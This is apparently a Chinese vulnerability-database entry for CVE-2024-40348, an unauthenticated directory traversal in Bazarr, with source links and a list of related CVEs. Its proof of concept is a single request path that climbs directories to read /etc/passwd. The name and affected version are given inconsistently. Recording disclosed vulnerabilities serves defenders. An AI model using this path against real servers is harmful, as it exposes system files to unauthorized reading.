Bazarr任意文件读取(CVE-2024-40348)

日期: 2024-07-25 | 影响软件: Bazarr | POC: 已公开

漏洞描述

Bazaar v1.4.3 的组件 /api/swaggerui/static 中存在一个问题，允许未经身份验证的攻击者执行目录遍历。

PoC代码[已公开]

# Bazarr任意文件读取(CVE-2024-40348)



Bazaar v1.4.3 的组件 /api/swaggerui/static 中存在一个问题，允许未经身份验证的攻击者执行目录遍历。



## poc



```yaml

/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd

```







## 漏洞来源



- https://www.seebug.org/vuldb/ssvid-99863

- https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md

来源: https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md

漏洞描述

PoC代码[已公开]

相关漏洞推荐

CVE-2024-40348: Bazarr < 1.4.3 - Arbitrary File Read POC

Bazarr /system/backup/download 文件读取漏洞（CVE-2023-50264） 无POC

Bazarr swaggerui static 接口任意文件读取漏洞 无POC

Journyx /jtcgi/soap_cgi.pyc XML外部实体注入漏洞（CVE-2024-6893） 无POC

Whoogle search 代码执行漏洞（CVE-2024-53305） 无POC

Bazarr /system/backup/download 文件读取漏洞（CVE-2023-50264）无POC

Bazarr swaggerui static 接口任意文件读取漏洞无POC

Journyx /jtcgi/soap_cgi.pyc XML外部实体注入漏洞（CVE-2024-6893）无POC

Whoogle search 代码执行漏洞（CVE-2024-53305）无POC